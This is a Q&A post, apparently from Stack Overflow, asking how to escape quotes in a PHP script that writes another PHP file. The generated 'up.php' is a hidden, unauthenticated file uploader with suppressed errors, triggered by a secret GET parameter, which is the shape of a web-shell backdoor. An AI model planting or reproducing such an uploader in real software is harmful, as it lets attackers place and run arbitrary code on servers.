# creating a directory and a file using another php file (single and double quotes )

Tags: php, quotes, double-quotes

so i made this php script,i want to make a dir and then make a file inside this dir and fill it with another php code,the problem is the quotes,check out this:

```
<?php
@mkdir('kendo',0777);
$f1 = @fopen ('kendo/up.php','w');
$f2 = '
<?php
error_reporting(0);
$system = $_GET['km'];
if($system == 'up'){
$temp = $_FILES['file']['tmp_name'];
$nan = $_FILES['file']['name'];
echo "<form method='POST' enctype='multipart/form-data'>
<input type='file'name='file' />
<input type='submit' value='upload' />
</form>";
move_uploaded_file($temp,$nan);
}
?>

';
@fwrite($f1 , $f2);
?>
```

i want to make a dir called kendo ok? and inside this dir i want to make another php file with a simple upload script,the thing is the quotes ruins the code,the second variable which is :

```
$f2 = '
<?php
error_reporting(0);
$system = $_GET['km'];
if($system == 'up'){
$temp = $_FILES['file']['tmp_name'];
$nan = $_FILES['file']['name'];
echo "<form method='POST' enctype='multipart/form-data'>
<input type='file'name='file' />
<input type='submit' value='upload' />
</form>";
move_uploaded_file($temp,$nan);
}
?>

';
```

starts with a single quote and the php file that i want to create contains also single quotes and double quotes as i'll always get an error,anyway to filter this?

Comment: You need to escape your quotes with a backslash.

For example: $myString = "This contains \" a speech mark"; --- Or: $myString = 'This contains \' a apostrophe';

Comment: should i do that with every single quote in the script?

Comment: Ty Mark Phillips it wored :D